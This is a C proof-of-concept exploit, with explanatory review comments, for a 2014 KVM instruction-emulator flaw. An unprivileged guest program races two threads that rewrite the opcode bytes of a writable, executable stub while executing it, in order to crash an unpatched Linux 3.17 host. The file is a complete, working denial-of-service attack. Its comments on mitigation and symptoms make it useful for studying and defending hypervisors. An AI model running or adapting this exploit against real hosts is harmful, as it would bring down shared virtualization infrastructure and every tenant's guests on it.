// KVM clflush sploit (crashes a Linux 3.17 host)
// Copyright (c) 2014 Andy Lutomirski
//
// Proof-of-concept guest program. Per the header it takes down an unpatched
// 3.17 host from an unprivileged guest process: two threads race over the
// first two bytes of a tiny, writable code stub while that stub is executed
// in a loop. The component that actually fails is the host-side KVM
// instruction emulator, which is not part of this file. The mitigation is a
// host kernel carrying the corresponding emulator fix; on such a host this
// program is just a busy loop. Note for operators: a host oops attributed to
// the KVM emulator while a guest is running is the observable symptom.

#include <pthread.h>
#include <err.h>
#include <stdio.h>      // NOTE(review): stdio/stdint/signal/setjmp/string are
#include <stdint.h>     // not used by the visible code below.
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>

// The stub is placed in a custom section whose flags are "awx" (allocated,
// writable, executable) so its instruction bytes can be patched from C at
// runtime. Initial contents: `clflush (%rip)` followed by `ret`.
asm (".pushsection .wtext, \"awx\"\n"
     "badcode:\n\t"
     "clflush (%rip)\n\t"
     "ret\n"
     ".popsection");

// View of the stub as 16-bit words; badcode[0] covers its first two opcode
// bytes. Declared volatile so the repeated stores below are not merged or
// dropped by the compiler.
extern volatile unsigned short badcode[];

// Writer thread: forever stores 0xae0f into the stub's first word, i.e. the
// little-endian bytes 0f ae that lead the clflush encoding the stub was
// assembled with. The parameter is unused and the loop never exits, so the
// trailing return only satisfies the pthread start-routine signature.
static void *proc(void *ignored)
{
	while (true)
		badcode[0] = 0xae0f;
	return NULL;
}

// Entry point. Never returns: after setup it loops over "patch, then call".
int main()
{
	// Raise the I/O privilege level to 3 so port-I/O instructions are
	// permitted from user mode; the alternate encoding written into the
	// stub below needs this. Aborts with the errno message if refused.
	if (iopl(3) != 0)
		err(1, "iopl");

	pthread_t pth;
	// NOTE(review): the return value is unchecked; if thread creation
	// fails, the loop below runs without the competing writer and the
	// race the PoC depends on never happens.
	pthread_create(&pth, NULL, proc, NULL);

	// Main thread: overwrite the same word with 0x00e4 (bytes e4 00) and
	// immediately execute the stub. Together with the writer thread this
	// keeps the stub's first instruction flipping between two encodings
	// while it is being called; presumably the host emulator observes an
	// inconsistent instruction as a result — the failing code path is in
	// KVM, so this cannot be confirmed from here. The clobber list tells
	// the compiler that %ax and the flags may be changed by the call.
	while (true) {
		badcode[0] = 0x00e4;
		asm volatile ("call badcode" : : : "ax", "flags");
	}
}